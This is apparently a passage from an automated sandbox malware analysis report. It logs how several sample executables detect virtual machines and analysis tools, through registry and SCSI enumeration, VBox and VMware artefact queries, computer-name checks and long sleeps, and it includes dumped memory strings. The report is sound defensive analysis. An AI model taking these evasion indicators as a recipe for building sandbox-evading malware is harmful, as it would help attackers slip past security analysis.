Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\fcriduf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_8-23259

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: \KnownDlls32\sElF.eXE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: HVqTxn73uD.exe, 00000000.00000002.2032659331.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, sfriduf, 00000004.00000002.2274924307.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: 6F54.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES

Source: C:\Users\user\AppData\Local\Temp\6F54.exe	File opened / queried: VBoxGuest
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	File opened / queried: VBoxTrayIPC
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 391	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 510	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 745	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 802	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 769	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Window / User API: threadDelayed 1577	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 3354
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 2965
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3347
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5585
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3292

Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56002\_hashlib.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_8-23427

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_8-22790

Source: C:\Windows\explorer.exe TID: 5440	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1012	Thread sleep time: -32400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5440	Thread sleep time: -74500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe TID: 6488	Thread sleep time: -157700s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe TID: 4416	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 6508	Thread sleep count: 3354 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 6508	Thread sleep time: -335400s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 4752	Thread sleep count: 2965 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 4752	Thread sleep time: -296500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2860	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4276	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\6F54.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E6CD1 _free,_free,FindFirstFileExW,		8_2_005E6CD1
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E6D85 FindFirstFileExW,FindNextFileW,FindClose,		8_2_005E6D85

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI56002\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\

Source: 6F54.exe	Binary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
Source: explorer.exe, 00000002.00000000.2025009942.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: 6F54.exe	Binary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000000.2022279576.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: 6F54.exe	Binary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
Source: 6F54.exe	Binary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 4294.exe, 00000008.00000002.2397262813.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 6F54.exe	Binary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
Source: 2788.exe, 00000006.00000003.4173128113.00000000030F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAJtcCCBEuPXqEMu2rREZdSYB+1TY6HE/BWrbN1/ZfMwxUulfEocqfD/3
Source: 6F54.exe	Binary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
Source: 2788.exe, 00000006.00000003.3784656316.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAMZvmci/v9lu2mS+O/M3cUaAMvMrIOsTCKVWdgTHvKYn6UHCdNCgnztj
Source: 2788.exe, 00000006.00000003.3671523630.0000000003372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: 6F54.exe	Binary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
Source: 6F54.exe	Binary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
Source: 6F54.exe	Binary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: 2788.exe, 00000006.00000003.3793314675.000000000446E000.00000004.00000020.00020000.00000000.sdmp, 2788.exe, 00000006.00000003.3748598234.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBANR5BdXVbpdMX3Ob1V3BfuQemU8uU69NjLB2JC4zlLSJaVSbQRjWJMEV
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.2023573393.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 6F54.exe	Binary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
Source: 6F54.exe	Binary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
Source: explorer.exe, 00000002.00000000.2022865976.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 6F54.exe	Binary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
Source: explorer.exe, 00000002.00000000.2023573393.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2023573393.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: 6F54.exe	Binary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
Source: 6F54.exe	Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 6F54.exe	Binary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
Source: explorer.exe, 00000002.00000000.2022865976.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: 6F54.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
